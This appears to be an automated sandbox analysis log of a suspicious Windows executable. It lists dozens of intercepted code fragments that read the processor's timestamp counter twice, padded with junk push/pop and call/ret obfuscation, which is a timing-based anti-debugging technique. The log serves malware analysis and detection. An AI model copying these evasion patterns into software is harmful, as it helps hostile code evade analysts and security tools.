Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3E80B second address: F3E844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CD5h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCC4DE8CD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3E9EF second address: F3E9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3EBAB second address: F3EBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3EBAF second address: F3EBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBCC4EB33B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3EBCD second address: F3EBD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F41D7C second address: F41D86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F41D86 second address: F41D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F42129 second address: F4212E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F412E7 second address: F41304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F435B8 second address: F435BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F09BA2 second address: F09BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C96D second address: F4C98A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F13D94 second address: F13DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CD9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F13DB3 second address: F13DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F13DB9 second address: F13DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FBCC4DE8CD3h 0x00000010 popad 0x00000011 jo 00007FBCC4DE8CD9h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C107 second address: F4C10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C10D second address: F4C112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C112 second address: F4C11C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCC4EB33ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C11C second address: F4C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C124 second address: F4C12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C532 second address: F4C557 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCC4DE8CC6h 0x00000008 jmp 00007FBCC4DE8CD5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C6AC second address: F4C6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C6B4 second address: F4C6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C6BD second address: F4C6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4C6C1 second address: F4C6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4E73A second address: F4E73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F4F74D second address: F4F751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5072F second address: F5073C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F52FFC second address: F53000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F53000 second address: F53014 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F53014 second address: F53085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e jng 00007FBCC4DE8CD2h 0x00000014 jno 00007FBCC4DE8CCCh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FBCC4DE8CC8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 or dword ptr [ebp+122D3095h], edi 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FBCC4DE8CD4h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F53985 second address: F5399D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5375F second address: F53765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5399D second address: F539AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F53765 second address: F5376B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F539AB second address: F539AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5376B second address: F5376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5376F second address: F53780 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F53780 second address: F53786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F54E43 second address: F54E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F54E48 second address: F54EA3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBCC4DE8CC8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov si, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FBCC4DE8CC8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jnc 00007FBCC4DE8CCBh 0x00000034 xchg eax, ebx 0x00000035 jmp 00007FBCC4DE8CCDh 0x0000003a push eax 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FBCC4DE8CCAh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F57B18 second address: F57B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F591B1 second address: F591B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5B213 second address: F5B217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5A3C2 second address: F5A3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5FBF2 second address: F5FBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5DB89 second address: F5DB8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5FBF6 second address: F5FC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBCC4EB33A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5FC06 second address: F5FC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F5FC0A second address: F5FC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F0D240 second address: F0D24A instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F61243 second address: F612BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FBCC4EB33A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007FBCC4EB33A8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov di, si 0x00000044 push 00000000h 0x00000046 or dword ptr [ebp+122D30A0h], esi 0x0000004c xchg eax, esi 0x0000004d jc 00007FBCC4EB33BFh 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F62120 second address: F6214A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4DE8CCAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F61476 second address: F61480 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6240D second address: F62417 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F630A2 second address: F63105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx ebx, dx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBCC4EB33A8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 or di, 8547h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FBCC4EB33A8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D25ADh], edx 0x0000004f push eax 0x00000050 jnp 00007FBCC4EB33B4h 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F62417 second address: F6242F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64EBC second address: F64EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64EC8 second address: F64ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F675DD second address: F675EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F675EA second address: F67632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FBCC4DE8CC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov edi, eax 0x00000024 push 00000000h 0x00000026 add ebx, 3B924D65h 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f movsx esi, ax 0x00000032 sub dword ptr [ebp+1247D4F1h], ecx 0x00000038 popad 0x00000039 sbb bx, D02Ah 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F67632 second address: F67637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6410E second address: F64113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64113 second address: F64119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64119 second address: F64129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F651B0 second address: F651D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCC4EB33B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F68797 second address: F687BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FBCC4DE8CD0h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6A824 second address: F6A834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F687BC second address: F68853 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub bl, 00000058h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 pop ebx 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FBCC4DE8CC8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov bh, dl 0x00000036 mov eax, dword ptr [ebp+122D0CD5h] 0x0000003c mov edi, dword ptr [ebp+122D3982h] 0x00000042 stc 0x00000043 push FFFFFFFFh 0x00000045 mov edi, dword ptr [ebp+1247EED4h] 0x0000004b nop 0x0000004c jc 00007FBCC4DE8CE5h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007FBCC4DE8CD5h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F68853 second address: F68858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6A834 second address: F6A89F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FBCC4DE8CC8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 pushad 0x0000002a mov eax, dword ptr [ebp+122D37DEh] 0x00000030 mov si, 4492h 0x00000034 popad 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+122D24C4h], eax 0x0000003d push 00000000h 0x0000003f mov edi, edx 0x00000041 xchg eax, esi 0x00000042 jmp 00007FBCC4DE8CD9h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FBCC4DE8CC6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F69930 second address: F6993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6993C second address: F69940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6B860 second address: F6B86A instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4EB33ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6EF60 second address: F6EF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F751DD second address: F751E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F751E3 second address: F7521D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBCC4DE8CD9h 0x0000000e jmp 00007FBCC4DE8CD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7521D second address: F7523A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F748F0 second address: F748FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F748FD second address: F74901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74901 second address: F74922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBCC4DE8CD9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74922 second address: F74927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
